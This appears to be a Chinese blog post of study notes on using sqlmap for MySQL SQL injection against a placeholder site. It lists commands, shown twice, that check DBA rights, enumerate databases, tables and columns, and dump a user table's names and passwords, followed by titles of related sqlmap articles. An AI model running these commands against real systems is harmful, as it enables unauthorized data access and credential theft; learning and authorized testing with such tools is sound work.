SQLMAP渗透笔记之MySQL数据库注入
2017-12-26 11:35
239 查看
---------------------------------------------------------------------------------------------
SQLMAP渗透笔记之MySQL数据库注入
---------------------------------------------------------------------------------------------
sqlmap.py -u http://www.xx.com/show.php?id=81 --当前用户权限
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --is-dba
sqlmap.py -u http://www.xx.com/show.php?id=81 --所有数据库用户
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --users
sqlmap.py -u http://www.xx.com/show.php?id=81 --当前数据库用户
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --current-user
1.检测注入点,判断数据库类型及服务器等类型
sqlmap.py -u http://www.xx.com/show.php?id=81
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81"
2.获取所有数据库
sqlmap.py -u http://www.xx.com/show.php?id=81 --获取所有数据库
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --dbs
3.获取网站当前数据库
sqlmap.py -u http://www.xx.com/show.php?id=81 --获取网站当前数据库
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --current-db
4.获取数据库中的表
sqlmap.py -u http://www.xx.com/show.php?id=81 -D 指定一个数据库 --tables
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb --tables
5.获取数据表中的字段
sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 --columns
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb -T user --columns
6.获取字段中的内容
sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 -C 字段名1,字段名2,字段名3... --dump
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb -T user -C "u_id,u_name,u_pass" --dump
SQLMAP渗透笔记之MySQL数据库注入
---------------------------------------------------------------------------------------------
sqlmap.py -u http://www.xx.com/show.php?id=81 --当前用户权限
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --is-dba
sqlmap.py -u http://www.xx.com/show.php?id=81 --所有数据库用户
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --users
sqlmap.py -u http://www.xx.com/show.php?id=81 --当前数据库用户
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --current-user
1.检测注入点,判断数据库类型及服务器等类型
sqlmap.py -u http://www.xx.com/show.php?id=81
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81"
2.获取所有数据库
sqlmap.py -u http://www.xx.com/show.php?id=81 --获取所有数据库
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --dbs
3.获取网站当前数据库
sqlmap.py -u http://www.xx.com/show.php?id=81 --获取网站当前数据库
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" --current-db
4.获取数据库中的表
sqlmap.py -u http://www.xx.com/show.php?id=81 -D 指定一个数据库 --tables
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb --tables
5.获取数据表中的字段
sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 --columns
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb -T user --columns
6.获取字段中的内容
sqlmap.py -u http://www.xx.com/show.php?id=81 -D 数据库 -T 数据表 -C 字段名1,字段名2,字段名3... --dump
例:
sqlmap.py -u "http://www.xx.com/show.php?id=81" -D zsb -T user -C "u_id,u_name,u_pass" --dump
相关文章推荐
- SQLMAP渗透笔记之POST登陆框注入
- SQLMAP渗透笔记之Cookie中转注入
- 【安全牛学习笔记】SQLMAP- 自动注入
- 【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF IN
- SQLMAP渗透笔记之交互写shell及命令执行(即os参数的使用)
- SQLMAP渗透笔记之请求延时
- SQLMAP渗透笔记之绕过WAF防火墙
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- 【安全牛学习笔记】课时94 SQLMAP自动注入-REQUEST和SQLMAP自动注入-OPTIMIZATION
- 【安全牛学习笔记】SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT
- 渗透测试:sqlmap伪静态注入与携带cookie登录认证注入
- 【安全牛学习笔记】SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、M
- 1.羽翼sqlmap学习笔记之Access注入
- SQLMAP注入神器笔记
- 2.羽翼sqlmap学习笔记之MySQL注入
- SQLMAP渗透笔记之file参数的使用
- 4.羽翼sqlmap学习笔记之Post登录框注入
- 渗透神器sqlmap的使用笔记
- 【安全牛学习笔记】SQLMAP自动注入-REQUEST
- 渗透神器sqlmap的使用笔记